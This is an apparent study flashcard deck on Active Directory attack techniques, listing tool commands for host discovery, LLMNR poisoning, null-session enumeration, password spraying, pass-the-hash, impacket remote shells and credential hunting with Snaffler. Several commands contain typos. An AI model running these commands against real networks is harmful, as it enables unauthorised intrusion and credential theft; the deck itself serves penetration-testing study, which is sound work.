Windows Active Directories Flashcards

1
Q

Identifying hosts:
how to identify hosts in a Linux attack box. list 4 methods (tools)

A

look for ARP, MDNS, DNS requests and see the IPs
1) sudo -E wireshark or tcp dump
2) responder -I tun0 -A (analyze mode for LLMNR, NBT-NS not covered by the others)
3)fping -asgq 172.16.5.0/23
4)nmap

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

AD username enumeration with no creds from Linux.
what tools?

A

1) kerbrute userenum -d <domain> --dc <ip> jsmith.txt -o result_users
2)enum4linux -U <ip>
3) rpcclient -u "" -N <ip>
4) crackmapexec smb <ip> --users
5) ldapsearch
6)windapsearch</ip></ip></ip></ip></domain>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

LLMNR/NBT-NS poisoning with LINUX
which tool and which flags?

A

use responder -A (also try -w for wpad web proxy auto discover)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

LLMNR/NBT-NS Poisoning with WINDOWS
which tool?

A

use inveigh.exe
use esc for interactive mode
look for command get ntlmv2unique

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Enumerating password policies from linux (4 tools)

A

1)crackmapexec but you need the DC host with creds!
crackmapexec smb <ip> -u username -p password --pass-pol
2) rpcclient (SMB null sessions)
rpcclient -U "" -N <ip>
querydominfo, getdompwinfo
3)enum4linux -P <ip>
4)ldapsearch</ip></ip></ip>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Enumerating password policies from windows (3 tools)

A

1)net use \host\ipc$ “” /u:”” (eg host= DC01)
or net use \DC01\ipc$ “password” /u:guest
2)net accounts
3)import-module PowerView.ps1
Get-DomainPolicy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Password spray and hash from linux (3 tools)

A

1)for loop with rpcclient
2) kerbrute passwordpray -d domain –dc ip users_list “password”
3)sudo crackmapexec smb -u user_list -p Password
4) sudo crasckmapexec smb –local-auth ip_range -u admin -H hash

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Password spray from windows

A

domainpasswordspray.ps1
import-module DomainPasswordSpray.ps1
invoke-domainPasswordSpray -Password Welcome1 -Outfile file.txt -ErrorAction SilentlyContinue

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

If we have AD creds, from Linux
1)enumerate users (3 tools)
2)logged on users
3)shares (2 tools)
4) single share

A

1)sudo crackmapexec smb ip -u .. -p .. –users
or
python3 windapsearch.py –dc-ip ip -u user@inlane.local -p .. -da (da=enumerate users) or –PU (enumerate privileged users)
or sudo bloodhound-python -u .. -p .. -ns ip -d domain -c all (creates zip file)
2)sudo crackmapexec smb ip -u .. -p .. –loggedon-users
3) sudo crackmapexec smb ip -u .. -p … –shares
or
smbmap -u .. -p .. -d domain-H <ip>
4) sudo crackmapexec smb ip -u .. -p ... --share share_name</ip>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

create a remote session with impacket and credentials (2 tools)

A

psexec.py inlanefreight.local/user:password@ip

wmiexec.py inlanefreight.local/user:password@ip

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Sharphound + bloodhound

A

sharphound.exe -c All -d domain (–ExcludeDCs)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

If we have AD creds from windows PS, check if i’m alone

A

import-module ActiveDirectory (check with get-module)
1) get-addomain
2) get-aduser (with SPN)
3)get-adtrust
4)get-adgroup
5)get-adgroupmember -identity user_name
6)qwinsta

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

tool to get passw in AD from a local windows machine

A

snaffler.exe -d domain -s -v data

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

In windows, check defenses

A

netsh advfirewall show all profiles (PS)
sc query windefend (CMD)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

windows, if i’m system user, how can enumerate from PS

A

dsqeury user (computer, …)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly